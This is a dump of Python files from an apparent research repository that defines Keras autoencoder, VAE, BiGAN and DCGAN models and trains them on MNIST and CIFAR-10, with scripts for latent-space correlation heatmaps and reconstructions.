img_shape = (img_rows, img_cols, channels)
latent_dim = 100
def encoder_model():
model = Sequential()
model.add(Flatten(input_shape=img_shape))
model.add(Dense(512, input_shape=(latent_dim,)))
model.add(LeakyReLU(alpha=0.2))
model.add(BatchNormalization(momentum=0.8))
model.add(Dense(512))
model.add(LeakyReLU(alpha=0.2))
model.add(BatchNormalization(momentum=0.8))
model.add(Dense(latent_dim))
return model
def sparse_encoder_model():
model = Sequential()
model.add(Flatten(input_shape=img_shape))
model.add(Dense(512, activity_regularizer=l1(10e-5)))
model.add(LeakyReLU(alpha=0.2))
model.add(BatchNormalization(momentum=0.8))
model.add(Dense(512, activity_regularizer=l1(10e-5)))
model.add(LeakyReLU(alpha=0.2))
model.add(BatchNormalization(momentum=0.8))
model.add(Dense(latent_dim))
return model
def vae_encoder_model():
x = Input(shape=img_shape)
x_enc = Flatten()(x)
x_enc = Dense(512)(x_enc)
x_enc = LeakyReLU(alpha=0.2)(x_enc)
x_enc = Dense(512)(x_enc)
x_enc = LeakyReLU(alpha=0.2)(x_enc)
z_mean = Dense(latent_dim)(x_enc)
z_log_var = Dense(latent_dim)(x_enc)
return Model(x, [z_mean, z_log_var])
def generator_model(gan=False):
model = Sequential()
model.add(Dense(512, input_shape=(latent_dim,)))
model.add(LeakyReLU(alpha=0.2))
model.add(BatchNormalization(momentum=0.8))
model.add(Dense(512, input_shape=(latent_dim,)))
model.add(LeakyReLU(alpha=0.2))
model.add(BatchNormalization(momentum=0.8))
model.add(Dense(np.prod(img_shape)))
if gan is False:
model.add(Activation('sigmoid'))
if gan is not False:
model.add(Activation('tanh'))
model.add(Reshape(img_shape))
return model
def context_generator_model(missing_shape):
model = Sequential()
model.add(Dense(512, input_shape=(latent_dim,)))
model.add(LeakyReLU(alpha=0.2))
model.add(BatchNormalization(momentum=0.8))
model.add(Dense(512))
model.add(LeakyReLU(alpha=0.2))
model.add(BatchNormalization(momentum=0.8))
model.add(Dense(np.prod(missing_shape)))
model.add(Activation('tanh'))
model.add(Reshape(missing_shape))
return model
def bigan_discriminator_model():
z = Input(shape=(latent_dim,))
img = Input(shape=img_shape)
d_in = concatenate([z, Flatten()(img)])
model = Dense(1024)(d_in)
model = LeakyReLU(alpha=0.2)(model)
model = Dropout(0.5)(model)
model = Dense(1024)(model)
model = LeakyReLU(alpha=0.2)(model)
model = Dropout(0.5)(model)
model = Dense(1024)(model)
model = LeakyReLU(alpha=0.2)(model)
model = Dropout(0.5)(model)
validity = Dense(1, activation='sigmoid')(model)
return Model([z, img], validity)
def gan_discriminator_model():
img = Input(shape=img_shape)
model = Flatten()(img)
model = Dense(1024)(model)
model = LeakyReLU(alpha=0.2)(model)
model = Dropout(0.5)(model)
model = Dense(1024)(model)
model = LeakyReLU(alpha=0.2)(model)
model = Dropout(0.5)(model)
model = Dense(1024)(model)
model = LeakyReLU(alpha=0.2)(model)
model = Dropout(0.5)(model)
validity = Dense(1, activation='sigmoid')(model)
return Model(img, validity)
def aae_discriminator_model():
z = Input(shape=(latent_dim,))
model = Dense(1024)(z)
model = LeakyReLU(alpha=0.2)(model)
model = Dropout(0.5)(model)
model = Dense(1024)(model)
model = LeakyReLU(alpha=0.2)(model)
model = Dropout(0.5)(model)
model = Dense(1024)(model)
model = LeakyReLU(alpha=0.2)(model)
model = Dropout(0.5)(model)
validity = Dense(1, activation='sigmoid')(model)
return Model(z, validity)
def context_discriminator_model(missing_shape):
img = Input(shape=missing_shape)
model = Flatten()(img)
model = Dense(1024)(model)
model = LeakyReLU(alpha=0.2)(model)
model = Dropout(0.5)(model)
model = Dense(1024)(model)
model = LeakyReLU(alpha=0.2)(model)
model = Dropout(0.5)(model)
model = Dense(1024)(model)
model = LeakyReLU(alpha=0.2)(model)
model = Dropout(0.5)(model)
validity = Dense(1, activation='sigmoid')(model)
return Model(img, validity) | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,497 | davidhayes3/ME-Project | refs/heads/master | /latent_space_visualization/statistical_analysis/cifar10/cifar10_interclass_correlations.py | import os
import glob
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn
from keras.datasets import cifar10
import numpy as np
import keras.utils
import matplotlib.pyplot as plt
from cifar10_models import encoder_model, deterministic_encoder_model
from scipy.stats.stats import pearsonr
# Define constants
num_classes = 10
latent_dim = 64
# Load saved models for encoder and decoder
encoder = deterministic_encoder_model()
encoder.load_weights('cifar10_bigan_determ_encoder.h5')
# Load MNIST data and split into train and test set
(X_train, y_train), (X_test, y_test) = cifar10.load_data()
X_train = X_train.astype(np.float32) / 255.
X_test = X_test.astype(np.float32) / 255.
y_test_one_hot = keras.utils.to_categorical(y_test, num_classes)
y_train = y_train.reshape((y_train.shape[0]))
# Encoder training set
latent_spaces = encoder.predict(X_train)
# Get max and min value of entire set for later plotting purposes
max = np.max(latent_spaces)
min = np.min(latent_spaces)
# Split training set into classes
latent_plane = latent_spaces[y_train == 0]
latent_automobile = latent_spaces[y_train == 1]
latent_bird = latent_spaces[y_train == 2]
latent_cat = latent_spaces[y_train == 3]
latent_deer = latent_spaces[y_train == 4]
latent_dog = latent_spaces[y_train == 5]
latent_frog = latent_spaces[y_train == 6]
latent_horse = latent_spaces[y_train == 7]
latent_ship = latent_spaces[y_train == 8]
latent_truck = latent_spaces[y_train == 9]
# Create list of all latent arrays
latent_sets = (latent_plane, latent_automobile, latent_bird, latent_cat, latent_deer, latent_dog, latent_frog,
latent_horse, latent_ship, latent_truck)
# Create empty array for correlations
correlations = np.zeros((latent_dim, latent_dim))
# Examine correlations between latent dimensions for two particular classes
for i in range(latent_dim):
for j in range(latent_dim):
correlations[i, j] = np.corrcoef(latent_cat[:, i], latent_dog[:, j])[0][1]
#correlations[i,j] = np.corrcoef(latent_ship[:,i], latent_automobile[:,j])[0][1]
# Create heatmap of correlation coefficients
seaborn.heatmap(correlations, cmap='RdYlGn_r', vmax=1.0, vmin=-1.0, linewidths=2.5)
# Change orientation of labels for easier readability
plt.yticks(rotation=0)
plt.xticks(rotation=90)
# Label axes
plt.xlabel('Cat')
plt.ylabel('Dog')
# Save plots
plt.savefig('cifar10_cat_dog_latent')
#plt.savefig('cifar10_ship_automobile_latent') | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,498 | davidhayes3/ME-Project | refs/heads/master | /other/mnist/bigan/mnist_dcgan.py | from __future__ import print_function, division
from keras.datasets import mnist
from keras.layers import Input, Dense, Reshape, Flatten, Dropout
from keras.layers import BatchNormalization, Activation, ZeroPadding2D
from keras.layers.advanced_activations import LeakyReLU
from keras.layers.convolutional import UpSampling2D, Conv2D
from keras.models import Sequential, Model
from keras.optimizers import Adam
import matplotlib.pyplot as plt
import sys
import numpy as np
img_rows = 28
img_cols = 28
channels = 1
img_shape = (img_rows, img_cols, channels)
latent_dim = 100
optimizer = Adam(0.0002, 0.5)
def save_imgs(gen_imgs, epoch):
r, c = 5, 5
# Rescale images 0 - 1
gen_imgs = 0.5 * gen_imgs + 0.5
fig, axs = plt.subplots(r, c)
# fig.suptitle("DCGAN: Generated digits", fontsize=12)
count = 0
for i in range(r):
for j in range(c):
axs[i, j].imshow(gen_imgs[count, :, :, 0], cmap='gray')
axs[i, j].axis('off')
count += 1
fig.savefig("Images/mnist_dcgan_%d.png" % epoch)
plt.close()
def build_generator():
model = Sequential()
model.add(Dense(128 * 7 * 7, activation="relu", input_shape=latent_dim))
model.add(Reshape((7, 7, 128)))
model.add(BatchNormalization(momentum=0.8))
model.add(UpSampling2D())
model.add(Conv2D(128, kernel_size=3, padding="same"))
model.add(Activation("relu"))
model.add(BatchNormalization(momentum=0.8))
model.add(UpSampling2D())
model.add(Conv2D(64, kernel_size=3, padding="same"))
model.add(Activation("relu"))
model.add(BatchNormalization(momentum=0.8))
model.add(Conv2D(1, kernel_size=3, padding="same"))
model.add(Activation("tanh"))
return model
def build_discriminator():
model = Sequential()
model.add(Conv2D(32, kernel_size=3, strides=2, input_shape=img_shape, padding="same"))
model.add(LeakyReLU(alpha=0.2))
model.add(Dropout(0.25))
model.add(Conv2D(64, kernel_size=3, strides=2, padding="same"))
model.add(ZeroPadding2D(padding=((0, 1), (0, 1))))
model.add(LeakyReLU(alpha=0.2))
model.add(Dropout(0.25))
model.add(BatchNormalization(momentum=0.8))
model.add(Conv2D(128, kernel_size=3, strides=2, padding="same"))
model.add(LeakyReLU(alpha=0.2))
model.add(Dropout(0.25))
model.add(BatchNormalization(momentum=0.8))
model.add(Conv2D(256, kernel_size=3, strides=1, padding="same"))
model.add(LeakyReLU(alpha=0.2))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(1, activation='sigmoid'))
return model
# Build and compile the discriminator
print('Discriminator')
discriminator = build_discriminator()
discriminator.compile(loss='binary_crossentropy',
optimizer=optimizer,
metrics=['accuracy'])
# Build and compile the generator
print('Generator')
generator = build_generator()
generator.compile(loss='binary_crossentropy', optimizer=optimizer)
# The generator takes noise as input and generated imgs
z = Input(shape=(100,))
img = generator(z)
# For the combined model we will only train the generator
discriminator.trainable = False
# The valid takes generated images as input and determines validity
valid = discriminator(img)
# The combined model (stacked generator and discriminator) takes
# noise as input => generates images => determines validity
combined = Model(z, valid)
combined.compile(loss='binary_crossentropy', optimizer=optimizer)
# Train models
# Load the dataset
(X_train, _), (_, _) = mnist.load_data()
# Rescale -1 to 1
X_train = (X_train.astype(np.float32) - 127.5) / 127.5
X_train = np.expand_dims(X_train, axis=3)
# Training hyperparameters
epochs = 100
batch_size = 32
save_interval = 5
num_batches = int(X_train.shape[0] / batch_size)
half_batch = int(batch_size / 2)
# Define arrays to hold progression of discriminator and bigan losses
d_batch_loss_trajectory = np.zeros(epochs * num_batches)
g_batch_loss_trajectory = np.zeros(epochs * num_batches)
d_epoch_loss_trajectory = np.zeros(epochs)
g_epoch_loss_trajectory = np.zeros(epochs)
for epoch in range(epochs):
# Print current epoch number
print("\nEpoch: " + str(epoch + 1) + "/" + str(epochs))
# Set epoch losses to zero
d_epoch_loss_sum = 0
g_epoch_loss_sum = 0
# Train on all batches
for batch in range(num_batches):
# ---------------------
# Train Discriminator
# ---------------------
# Select next batch of images from training set and encode
imgs = X_train[batch * batch_size: (batch + 1) * batch_size]
## Train d on full batch
# Sample noise and generate img
z = np.random.normal(size=(batch_size, latent_dim))
gen_imgs = generator.predict(z)
# Create labels for discriminator inputs
valid = np.ones((batch_size, 1))
fake = np.zeros((batch_size, 1))
## Train d on half batch
'''# Sample noise and generate img
z = np.random.normal(size=(half_batch, latent_dim))
gen_imgs = generator.predict(z)
# Select a random half of image batch and encode
idx = np.random.randint(0, batch_size, half_batch)
imgs = imgs[idx]
# Create labels for discriminator inputs
valid = np.ones((half_batch, 1))
fake = np.zeros((half_batch, 1))'''
## Train the discriminator (img -> z is valid, z -> img is fake)
d_loss_real = discriminator.train_on_batch(imgs, valid)
d_loss_fake = discriminator.train_on_batch(gen_imgs, fake)
d_loss = 0.5 * np.add(d_loss_real, d_loss_fake)
## Record discriminator batch loss details
d_batch_loss_trajectory[epoch * num_batches + batch] = d_loss[0]
d_epoch_loss_sum += d_loss[0]
# ---------------------
# Train Generator
# ---------------------
noise = np.random.normal(0, 1, (batch_size, latent_dim))
# Train the generator (wants discriminator to mistake images as real)
g_loss = combined.train_on_batch(noise, np.ones((batch_size, 1)))
g_batch_loss_trajectory[epoch * num_batches + batch] = g_loss
g_epoch_loss_sum += g_loss
# Print progress
print("[Epoch: %d, Batch: %d / %d] [D loss: %f, acc: %.2f%%] [G loss: %f]" % (epoch, batch, num_batches,
d_loss[0], 100 * d_loss[1], g_loss))
# Get epoch loss data
d_epoch_loss_trajectory[epoch] = d_epoch_loss_sum / num_batches
g_epoch_loss_trajectory[epoch] = g_epoch_loss_sum / num_batches
# If at save interval => save generated image samples
if epoch % save_interval == 0:
noise = np.random.normal(0, 1, (25, 100))
gen_imgs = generator.predict(noise)
save_imgs(gen_imgs, epoch)
## Visualization
# Plot loss curves
# Plot batch loss curves for g and d
plt.figure(1)
batch_numbers = np.arange((epochs * num_batches)) + 1
plt.plot(batch_numbers, d_batch_loss_trajectory, 'b-', batch_numbers, g_batch_loss_trajectory, 'r-')
plt.legend(['Discriminator', 'Generator'], loc='upper right')
plt.xlabel('Batch Number')
plt.ylabel('Loss')
plt.show()
# Plot epoch loss curves for g and d
plt.figure(2)
epoch_numbers = np.arange(epochs) + 1
plt.plot(epoch_numbers, d_epoch_loss_trajectory, 'b-', epoch_numbers, g_epoch_loss_trajectory, 'r-')
plt.legend(['Discriminator', 'Generator'], loc='upper left')
plt.xlabel('Epoch Number')
plt.ylabel('Average Minibatch Loss')
plt.savefig('Images/mnist_bigan_valloss_%d_epochs_%d_bs.png' % (epochs, batch_size))
plt.show() | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,499 | davidhayes3/ME-Project | refs/heads/master | /other/mnist/convolutional_autoencoder/mnist_conv_ae_train.py | from mnist_conv_ae_models import *
import keras.utils
from keras.datasets import mnist
import numpy as np
import matplotlib.pyplot as plt
from keras.callbacks import EarlyStopping, TensorBoard, ModelCheckpoint
from keras import backend as K
np.random.seed(1337) # for reproducibility
# Load dataset
(x_train, y_train), (x_test, y_test) = mnist.load_data()
x_train = x_train.astype('float32') / 255.
x_test = x_test.astype('float32') / 255.
x_train = np.reshape(x_train, (len(x_train), 28, 28, 1)) # adapt this if using `channels_first` image data format
x_test = np.reshape(x_test, (len(x_test), 28, 28, 1)) # adapt this if using `channels_first` image data format
y_train = keras.utils.to_categorical(y_train, 10)
y_test = keras.utils.to_categorical(y_test, 10)
# Create models for encoder, decoder and combined autoencoder
e = encoder_model()
d = decoder_model()
autoencoder = autoencoder_model(e, d)
print(e.count_params(), d.count_params(), autoencoder.count_params())
# Specify loss function and optimizer for autoencoder
#autoencoder.compile(optimizer='adam', loss='mse', metrics=['accuracy'])
autoencoder.compile(optimizer='adadelta', loss='binary_crossentropy', metrics=['accuracy'])
callbacks = [EarlyStopping(monitor='val_loss', min_delta=0, patience=5, verbose=0, mode='auto'),
TensorBoard(log_dir='/tmp/autoencoder', histogram_freq=5, write_graph=True,
write_images=True),
ModelCheckpoint('mnist_conv_autoencoder.h5', monitor='val_loss', save_best_only=True, verbose=0)
]
history = autoencoder.fit(x_train, x_train,
epochs=100,
batch_size=128,
shuffle=True,
validation_split = 1/12.,
callbacks=callbacks,
verbose=1
)
# Save encoder and decoder models
e.save_weights('mnist_conv_ae_encoder.h5', True)
d.save_weights('mnist_conv_ae_decoder.h5', True)
# Summarize history for accuracy
plt.plot(history.history['acc'])
plt.plot(history.history['val_acc'])
plt.title('Training vs Validation Accuracy')
plt.ylabel('Accuracy')
plt.xlabel('Epoch')
plt.legend(['Train', ' Validation'], loc='lower right')
plt.show()
# Summarize history for loss
plt.plot(history.history['loss'])
plt.plot(history.history['val_loss'])
plt.title('Training vs Validation Loss')
plt.ylabel('Loss')
plt.xlabel('Epoch')
plt.legend(['Train', 'Validation'], loc='upper right')
plt.show()
# Reconstruct images based on learned autencoder
recon_imgs = autoencoder.predict(x_test)
# Plot reconstructed images
n = 10
plt.figure(figsize=(20, 4))
for i in range(n):
# display original
ax = plt.subplot(2, n, i + 1)
plt.imshow(x_test[i].reshape(28, 28))
plt.gray()
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
# display reconstruction
ax = plt.subplot(2, n, i + 1 + n)
plt.imshow(recon_imgs[i].reshape(28, 28))
plt.gray()
ax.get_xaxis().set_visible(False)
ax.get_yaxis().set_visible(False)
plt.show() | {"/latent_space_visualization/synthetic_dataset/sd_vae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ce_train.py": ["/functions/data_funcs.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_basic_ae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/train_models/mnist_mlp/mnist_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/train_models/cifar10_cnn/cifar10_ce_train.py": ["/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_classifier_comparison.py": ["/common_models/classifier_models.py", "/common_models/common_models.py", "/functions/data_funcs.py"], "/semi_supervised/augmentation/cifar10_bigan_aug_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_bigan_deterministic_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_dae_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_ls_interpolations.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_plot_recons.py": ["/common_models/common_models.py", "/functions/data_funcs.py"], "/train_models/mnist_mlp/mnnist_classifier_comparison.py": ["/common_models/common_models.py", "/functions/data_funcs.py", "/common_models/classifier_models.py"], "/train_models/mnist_mlp/mnist_plot_recons.py": ["/functions/data_funcs.py"], "/semi_supervised/bigan/cifar10_bigan_comparison.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/train_models/cifar10_cnn/cifar10_vae_train.py": ["/functions/data_funcs.py", "/functions/visualization_funcs.py", "/functions/auxiliary_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_sae_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/semi_supervised/labelling_algorithm/cifar10_guided_labelling.py": ["/common_models/classifier_models.py", "/functions/data_funcs.py"], "/latent_space_visualization/synthetic_dataset/sd_lr_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/mnist_mlp/mnist_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"], "/train_models/mnist_mlp/mnist_lr_train.py": ["/functions/auxiliary_funcs.py", "/functions/data_funcs.py", "/functions/visualization_funcs.py", "/common_models/common_models.py"], "/latent_space_visualization/synthetic_dataset/sd_gan_train.py": ["/common_models/common_models.py", "/functions/auxiliary_funcs.py", "/functions/visualization_funcs.py"], "/train_models/cifar10_cnn/cifar10_aae_train.py": ["/common_models/common_models.py", "/functions/visualization_funcs.py", "/functions/data_funcs.py", "/functions/auxiliary_funcs.py"]} |
53,500 | davidhayes3/ME-Project | refs/heads/master | /train_models/mnist_mlp/mnnist_classifier_comparison.py | import keras
import numpy as np
from keras.callbacks import EarlyStopping, ModelCheckpoint
from mnist_mlp_models import encoder_model, vae_encoder_model
from common_models.common_models import vae_encoder_sampling_model
from functions.data_funcs import get_mnist
from common_models.classifier_models import mnist_classifier_e_frozen_model, mnist_classifier_e_trainable_model
# Set random seed for reproducibility
np.random.seed(12345)
# =====================================
# Define constants
# =====================================
img_rows = 28
img_cols = 28
channels = 1
img_shape = (img_rows, img_cols, channels)
latent_dim = 100
# =====================================
# Load data
# =====================================
# Load and preprocess data
(x_train, y_train), (x_test, y_test) = get_mnist()
# Distinguish training sets for models
(x_train_ae, _), (x_test_ae, _) = get_mnist()
(x_train_gan, _), (x_test_gan, _) = get_mnist(gan=True)
# Label data is same for both
y_train_one_hot = keras.utils.to_categorical(y_train, 10)
y_test_one_hot = keras.utils.to_categorical(y_test, 10)
# =====================================
# Instantiate and load models
# =====================================
# Instantiate encoders
basic_ae = encoder_model()
dae = encoder_model()
sae = encoder_model()
ce = encoder_model()
aae = encoder_model()
lr = encoder_model()
